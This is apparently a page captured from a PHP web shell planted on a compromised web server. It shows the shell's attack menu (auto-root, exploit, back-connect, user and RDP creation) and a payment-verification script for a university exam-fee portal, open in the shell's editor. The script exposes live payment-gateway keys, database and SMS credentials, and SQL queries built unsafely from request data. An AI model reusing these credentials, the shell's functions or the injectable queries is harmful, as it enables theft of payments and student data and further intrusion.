Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.188.245.152
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mcu /
Paytm_test /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
config_paytm.php
1.44
KB
-rwxr-xr-x
encdec_paytm.php
7.02
KB
-rwxr-xr-x
pgResponse.php
10.8
KB
-rwxr-xr-x
verify.php
10.85
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : verify.php
<html> <head> <meta content="text/html;charset=utf-8" http-equiv="Content-Type"> <meta content="utf-8" http-equiv="encoding"> <link rel="shortcut icon" type="image/jpg" href="img/favicon.jpg" /> <?php require_once("links/js_files.php");?> <script src="js/candidate_list.js"></script> <script type="text/javascript"> $(function(){ $('.index_label_div').corner("5px").css("border","1px solid #6F6868"); $('.messageboard-div').corner("5px").css("border","1px solid #6F6868"); $('.reg_no_div').corner("bl br").css("border","1px solid #6F6868"); $('#main_message_board').corner("bl br").css("border","1px solid #2596CE"); $('.submit_div_button').corner("5px"); $('.div_app_form_center_blue').corner("tl tr"); $('.div_app_form_center_black').corner("tl tr"); $('#print_app_form').corner("5px"); }); </script> </head> <body> <div id='main_frame'> <div class='header_main_div'> <?php require_once("links/header.php");?> <div id='main_page_div' style=' text-align: center;'> <?php require('razorpay/config.php'); include("sendsmsapi.php"); session_start(); require('razorpay/razorpay-php/Razorpay.php'); use Razorpay\Api\Api; use Razorpay\Api\Errors\SignatureVerificationError; $success = true; $error = "Payment Failed"; if (empty($_POST['razorpay_payment_id']) === false) { $api = new Api($keyId, $keySecret); try { // Please note that the razorpay order ID must // come from a trusted source (session here, but // could be database or something else) $attributes = array( 'razorpay_order_id' => $_SESSION['razorpay_order_id'], 'razorpay_payment_id' => $_POST['razorpay_payment_id'], 'razorpay_signature' => $_POST['razorpay_signature'] ); $api->utility->verifyPaymentSignature($attributes); //var_dump($api); } catch(SignatureVerificationError $e) { $success = false; $error = 'Razorpay Error : ' . $e->getMessage(); } } if ($success === true) { $html = "<p>Your payment was successful</p> <p>Payment ID: {$_POST['razorpay_payment_id']}</p>"; // use Razorpay\Api\Api; $paymentid = $_POST['razorpay_payment_id']; $api = new Api('rzp_live_lVO72svmz42oDZ', 'Nj0YQdOD9dACoFSGVZysKdrd'); $payment = $api->payment->fetch("{$paymentid}"); $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; /* $servername = "localhost"; $username = "root"; $password = "";*/ $dbname = "logisys3_comexam"; $conn = new mysqli($servername, $username, $password, $dbname); $get_data = "select * from dbname"; $result1=$conn->query($get_data); if (mysqli_num_rows($result1) > 0) { // output data of each row $dbnames = array(); while($row = mysqli_fetch_assoc($result1)) { $dbnames[$row['FUNIVCODE']] = $row['FDBNAME']; } } mysqli_close($conn); $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; /* $servername = "localhost"; $username = "root"; $password = "";*/ $dbname = $dbnames[$payment->notes->univcode]; $conn = new mysqli($servername, $username, $password, $dbname); $status = "success"; $productinfo = $payment->notes->appno; $txnid = $payment->id; $orderid = $payment->notes->order_id; $orderid = $payment->notes->order_id; $payment['TXNAMOUNT'] = ((float)$payment->amount/100); $firstname = 'razorpay'; $html = ""; echo "<h1 style='color:green;'>Thank You. Your order status is success</h1>"; echo "<h2>Your Transaction ID for this transaction is ".$txnid.".</h2>"; echo "<h3>We have received a payment of Rs. " . $payment['TXNAMOUNT'] ."</h3>"; $html=" <div class='raval_submit' style='width:241px;float:none; margin: 0 auto;' > <span onclick=\"PrintApplicationFormNETBANKING('{$productinfo}');\" style='float:left;margin-left:8px;cursor: pointer; line-height: 19px;font-size:14px;font-weight:bold;'>Click here to take a PrintOut</span> </div>"; echo $html; $html = ""; $update="update appcandsum set FPAYMENTREMARKS='{$txnid}',FPAYMENTSTATUS='success', FPAYMENTCONFIRM='success',FACKDATE=now(),FPAYGATEWAY = '{$firstname}',FACKUSER='{$firstname}', FORDERID = '{$orderid}' where APPNO='{$productinfo}'"; $result=$conn->query($update); $get_app_cand_det="SELECT a.FDEGREE,a.FEXAMNO,a.FCOLLCODE, a.FREGNO,a.FSUBCODE,a.FINSERTED,a.FPRESENT,a.FYEAR,a.FEXAMTYPE,concat('Message from Bengaluru Central University : ', ' Dear ',s.fname,' (Reg. no. : ',s.fregno,' , Stud. id. : ',s.fstudid,'),', ' Rs.',FLOOR(c.FTOTALFEE),'/- is received at university. Your application no. is ',c.appno, '. keep this information for future reference.',' Sent Time: ',time(now())) as message FROM appcanddet a inner join student s on a.fregno = s.fregno inner join appcandsum c on a.appno = c.appno WHERE c.APPNO='{$productinfo}'"; $result = $conn->query($get_app_cand_det); if (mysqli_num_rows($result) > 0) { while($row = mysqli_fetch_assoc($result)) { $collcode = $row['FCOLLCODE']; $degree = $row['FDEGREE']; $regno = $row['FREGNO']; $text = $row['message']; } } $update_cand_sum = "UPDATE appcandsum a,candsum c SET c.FEXAMFEEA=if(ifnull(c.FEXAMFEEA,0) <=0,ifnull(a.FEXAMFEEA,0),ifnull(c.FEXAMFEEA,0)), c.FEXAMFEEB=if(ifnull(c.FEXAMFEEB,0) <=0,ifnull(a.FEXAMFEEB,0),ifnull(c.FEXAMFEEB,0)), c.FEXAMFEEC=if(ifnull(c.FEXAMFEEC,0) <=0,ifnull(a.FEXAMFEEC,0),ifnull(c.FEXAMFEEC,0)), c.FEXAMFEED=if(ifnull(c.FEXAMFEED,0) <=0,ifnull(a.FEXAMFEED,0),ifnull(c.FEXAMFEED,0)), c.FEXAMFEEE=if(ifnull(c.FEXAMFEEE,0) <=0,ifnull(a.FEXAMFEEE,0),ifnull(c.FEXAMFEEE,0)), c.FEXAMFEEF=if(ifnull(c.FEXAMFEEF,0) <=0,ifnull(a.FEXAMFEEF,0),ifnull(c.FEXAMFEEF,0)), c.FEXAMFEEG=if(ifnull(c.FEXAMFEEG,0) <=0,ifnull(a.FEXAMFEEG,0),ifnull(c.FEXAMFEEG,0)), c.FEXAMFEEH=if(ifnull(c.FEXAMFEEH,0) <=0,ifnull(a.FEXAMFEEH,0),ifnull(c.FEXAMFEEH,0)), c.FEXAMFEEI=if(ifnull(c.FEXAMFEEI,0) <=0,ifnull(a.FEXAMFEEI,0),ifnull(c.FEXAMFEEI,0)), c.FEXAMFEEJ=if(ifnull(c.FEXAMFEEJ,0) <=0,ifnull(a.FEXAMFEEJ,0),ifnull(c.FEXAMFEEJ,0)), c.FTOTALFEE=a.FTOTALFEE, c.frecptdate = date(now()) WHERE a.fregno=c.FREGNO AND a.APPNO='{$productinfo}' and a.FCOLLCODE='{$collcode}'"; $result = $conn->query($update_cand_sum); $update_cand_appCand = "update canddet c, appcanddet t set c.finserted = t.finserted, c.fpresent = t.fpresent where c.fdegree = t.fdegree and c.fexamno = t.fexamno and c.fregno = t.fregno and c.fsubcode = t.fsubcode and c.fdegree = '{$degree}' and c.fregno = '{$regno}' and t.APPNO='{$productinfo}' and ifnull(c.fpresent,'') <> 'P'"; $result = $conn->query($update_cand_appCand); $insert_canddet ="insert into canddet(fdegree,FEXAMNO, FCOLLCODE, FREGNO, FSUBCODE, FINSERTED, FPRESENT, FYEAR, FEXAMTYPE) select fdegree, FEXAMNO, FCOLLCODE,FREGNO, FSUBCODE,FINSERTED, FPRESENT, FYEAR,FEXAMTYPE from appcanddet where fregno = '{$regno}' and appno ='{$productinfo}' and CONCAT(fdegree,fexamno,fregno,fsubcode) not in(select CONCAT(fdegree,fexamno,fregno,fsubcode) from canddet where fregno = '{$regno}') "; $result = $conn->query($insert_canddet); $update_studfee = "update studfee s, appstudfee a set s.famount = a.famount, s.flogdate = a.flogdate where s.fdegree = a.fdegree and s.fexamno = a.fexamno and s.fregno = a.fregno and s.ffeecode = a.ffeecode and s.fregno = '{$regno}' and a.appno ='{$productinfo}'"; $result = $conn->query($update_studfee); $insert_studfee = "insert into studfee(fdegree,fexamno,fcollcode,fregno,ffeecode,famount,flogdate) select fdegree,fexamno,fcollcode,fregno,ffeecode,famount,flogdate from appstudfee where fregno = '{$regno}' and appno ='{$productinfo}' and CONCAT(fdegree,fexamno,fregno,ffeecode) not in(select CONCAT(fdegree,fexamno,fregno,ffeecode) from studfee where fdegree = '{$degree}' and fregno = '{$regno}')"; $result = $conn->query($insert_studfee); $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; /* $servername = "localhost"; $username = "root"; $password = "";*/ $dbname = "logisys3_comexam"; $conn = new mysqli($servername, $username, $password, $dbname); $get_data = "select fmobileno from masuser where fregno = '{$regno}' and funivcode = '{$payment->notes->univcode}'"; $result1=$conn->query($get_data); if (mysqli_num_rows($result1) > 0) { // output data of each row $dbnames = array(); while($row = mysqli_fetch_assoc($result1)) { $to = $row['fmobileno']; } } $username = 'logisyhttp'; $password = 'Logis986'; $from = 'UNISOL'; $category = ''; $smsresp = sendsmaapi($username,$password,$from,$to,$text,$category); $strInsertQuery = "insert into smslog(funivcode, fregno,fmobileno, freasoncode, fguid, fenttype, fstatus,fackdate, facktime,fremarks) values('041','{$regno}','{$to}','PG','{$smsresp}','PG','{$smsresp}',now(),now(),'razorpay')"; $result1=$conn->query($strInsertQuery); mysqli_close($conn); } else { $html = "<p>Your payment failed</p> <p>{$error}</p>"; } echo $html; ?> </div> </br> </body> </html>
Close